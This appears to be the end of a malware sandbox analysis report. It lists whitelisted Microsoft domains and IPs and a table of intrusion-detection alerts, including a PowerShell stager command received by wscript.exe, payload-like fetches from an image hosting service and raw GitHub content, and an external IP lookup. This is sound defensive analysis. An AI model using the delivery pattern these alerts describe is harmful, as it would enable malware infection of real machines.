  • 20.190.159.0
  • 20.190.159.130
  • 40.126.31.67
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.22
  • 23.216.77.6
  • 23.216.77.15
  • 23.216.77.20
  • 23.216.77.13
  • 23.216.77.18
  • 23.216.77.26
  • 23.216.77.31
  • 23.216.77.7
  • 23.216.77.5
  • 23.216.77.25
  • 23.216.77.21
  • 23.216.77.27
  • 23.216.77.11
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 135.233.95.135
whitelisted

Threats

PID
Process
Class
Message
6988
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2324
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
7208
wscript.exe
Potentially Bad Traffic
ET ATTACK_RESPONSE PowerShell NoProfile Command Received In Powershell Stagers
7996
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7996
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7996
powershell.exe
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
7996
powershell.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
2324
svchost.exe
Potentially Bad Traffic
ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
7692
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7692
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
No debug info